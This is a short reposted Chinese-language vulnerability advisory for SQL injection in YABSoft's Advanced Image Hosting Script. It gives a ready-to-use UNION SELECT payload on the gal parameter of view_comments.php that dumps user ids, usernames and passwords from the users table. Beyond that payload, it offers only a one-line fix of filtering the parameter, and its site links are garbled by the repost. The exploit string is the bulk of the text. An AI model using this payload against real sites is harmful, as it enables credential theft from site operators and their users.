标题: AIHS (Advanced Image Hosting Script) SQL Injection Vulnerability 作者: Robert Cooper HdhCmsTest2cto测试数据 软件地址: http://yabsoft测试数据/ 测试平台: [ Linux /Windows 7] #缺陷文件: view_comments.php 缺陷处: view_comments.php?gal=[gallery id] 测试示例: HdhCmsTest2cto测试数据 /view_comments.php?gal=109 union all select 1,2,3,4,5,6,7,group_concat(id,0x3a,user,0x3a,pass,0x0a) FROM users-- HdhCmsTest2cto测试数据提供修复方案: 过滤view_comments.php页面gal参数输入 # Shouts to the Belegit crew
查看更多关于YABSoft Advanced Image Hosting Script SQL注射 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12641